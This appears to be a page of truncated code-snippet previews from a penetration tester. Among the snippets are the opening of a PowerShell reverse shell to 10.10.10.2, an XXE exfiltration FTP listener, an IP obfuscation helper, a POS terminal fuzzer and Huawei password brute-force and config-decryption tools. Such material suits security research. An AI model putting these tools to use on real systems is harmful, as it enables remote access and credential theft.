staaldraad

FROM ubuntu:14.04

MAINTAINER Etienne Stalmans, etienne@sensepost.com

RUN apt-get update && apt-get install -y \
 unzip \
 iptables

RUN apt-get install -y \
  build-essential \

staaldraad

#!/bin/bash

import sys
import binascii

tmp = binascii.a2b_base64(sys.argv[1])
out = ""

for x in tmp:
    out += chr(ord(x)^95) #xor with the underscore char (_)

staaldraad

#! /bin/bash
# PDF signing in Linux
# Author: etienne@sensepost.com
# Version: 1.0 16 October 2015
# Requirements: xv, imagemagick
# Check if requirements are met:
if ! which convert 2>/dev/null; then
    echo "ImageMagick not installed and is required"
    exit 1
fi

staaldraad

Create a sha256 hash (in uppercase) for each line in a file:
awk '{printf "%s - ",$1 }{"echo -n "$1"|sha256sum"|getline d;split(d,a,"-"); print toupper(a[1])}' notes.txt  

For each line in the 'reps.txt' - create a random string of correct length and do a replace.
for i in `cat reps.txt`; do                                                                                                                                                                              [16:28]
x=`cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w ${#i} | head -n 1`; echo $x;
sed -i "s/$i/$x/g" x6 ;
done

staaldraad

#!/usr/env/python
from __future__ import print_function
import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',2121))
s.listen(1)
print('XXE-FTP listening ')
conn,addr = s.accept()
print('Connected by %s',addr)

staaldraad

#!/usr/bin/env python

import sys
if len(sys.argv) < 2:
    print "Enter IP address as first argument: python %s 127.0.0.1"%sys.argv[0]
    sys.exit(1)

ip = sys.argv[1]
ips = ip.split('.')
iph = '0x{:02X}.0x{:02X}.0x{:02X}.0x{:02X}'.format(*map(int, ips))

staaldraad

$socket = new-object System.Net.Sockets.TcpClient('10.10.10.2', 8080);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
	$writer.Write("> ");
	$writer.Flush();
	$read = $null;

staaldraad

#!/usr/env/python
'''
    Script for fuzzing verifone terminal/pos devices. This is a bad reverse-engineer and implementation of the official protocol: http://web.archive.org/web/20120603221525/http://www.verifone.com/PDF/guides/tcl_ref.pdf

    Should work fine. Official docs were only found after the initial implementation. Not fully tested with CRC-16 checksum correctly implemented.

    Author: etienne@sensepost.com
    Version: 1.0
    License: GNU GENERAL PUBLIC LICENSE (GNU) Version 2
'''

staaldraad

#!/usr/bin/python

"""
Brute-force tool to find the username/password for MML on a Huawei device.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (14/01/2014)
"""

import sys
import telnetlib

staaldraad

#!/usr/bin/python
"""
Simple tool to extract local users and passwords from most Huawei routers/firewalls config files.
Will extract plain-text passwords and  crypted credentials. Huawei config files use DES encryption with 
a known key. Using this information, the script will decrypt credentials found in the config file.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (12/01/2014)
"""

from Crypto.Cipher import DES